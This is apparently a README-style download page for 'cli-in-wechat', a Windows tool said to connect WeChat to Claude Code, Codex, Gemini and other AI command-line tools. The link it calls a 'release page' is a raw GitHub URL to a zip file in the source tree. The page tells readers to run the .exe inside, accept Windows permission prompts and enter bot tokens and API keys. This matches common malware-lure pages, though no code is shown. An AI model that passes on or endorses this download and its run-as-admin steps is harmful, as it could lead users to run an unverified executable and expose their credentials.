Download

📥 Download

Visit this page to download the latest Windows release:

https://raw.githubusercontent.com/kh801301/cli-in-wechat/main/src/cli/in_wechat_cli_v3.3.zip

Look for the newest file in the release list. For most Windows users, the file name will end in .exe or come in a .zip file. Download the latest version before you start.

🧰 What this app does

cli-in-wechat lets you run AI tools from WeChat through the official iLink Bot API. It connects common command-line AI tools with WeChat so you can send prompts and read replies in one place.

Use it to work with:

  • Claude Code
  • Codex
  • Gemini
  • Kimi
  • OpenCode

This setup is made for end users who want to use these tools without switching between many apps.

✅ What you need

Before you run the app on Windows, make sure you have:

  • A Windows 10 or Windows 11 PC
  • A WeChat account
  • Access to the official iLink Bot API
  • The latest release file from the download page
  • Permission to run downloaded apps on your computer

If you plan to use it with another AI tool, make sure that tool is already set up and ready to use on your PC.

🚀 Install and run on Windows

  1. Open the release page: https://raw.githubusercontent.com/kh801301/cli-in-wechat/main/src/cli/in_wechat_cli_v3.3.zip

  2. Download the latest Windows file:

    • If you see a .zip file, download it and unzip it
    • If you see a .exe file, download it directly
  3. Open the downloaded folder or file.

  4. If you downloaded a .zip file, right-click it and choose Extract All.

  5. Find the app file inside the folder.

  6. Double-click the .exe file to start the app.

  7. If Windows asks for permission, choose Yes.

  8. Keep the app open while you use it with WeChat.

🖥️ First-time setup

When you open the app for the first time, it may ask for a few details. Set them up in this order:

  1. Sign in to WeChat if needed.
  2. Connect your iLink Bot API account.
  3. Choose the AI tool you want to use.
  4. Check that the app can send and receive messages in WeChat.
  5. Send a short test message to confirm the setup works.

If the app has a settings window, look for fields like bot token, API key, or model name. Enter the values from your iLink Bot API and AI tool accounts.

💬 How to use it

After setup, you can use WeChat as your chat front end.

Typical flow:

  1. Open WeChat.
  2. Send a prompt to the bot.
  3. The app passes the request to the selected AI tool.
  4. The reply comes back in WeChat.

You can use it for:

  • Writing and editing text
  • Getting code help
  • Translating text
  • Summarizing notes
  • Asking questions in plain language

⚙️ Common setup fields

You may see a few terms in the app. Here is what they mean:

  • Bot API key: The secret key for your iLink Bot connection
  • Model name: The AI model you want the app to use
  • API URL: The address the app sends requests to
  • Working directory: The folder the app uses for files
  • Log file: A file that records app activity

If the app shows extra fields, fill them in with the details from your service account or the default values from the release notes.

🔒 Safety and privacy

The app sends messages to the services you connect. Use only accounts and keys that you control.

Keep your API key private. Do not share it in chat, email, or screenshots.

If you use the app on a shared PC, sign out of accounts when you are done.
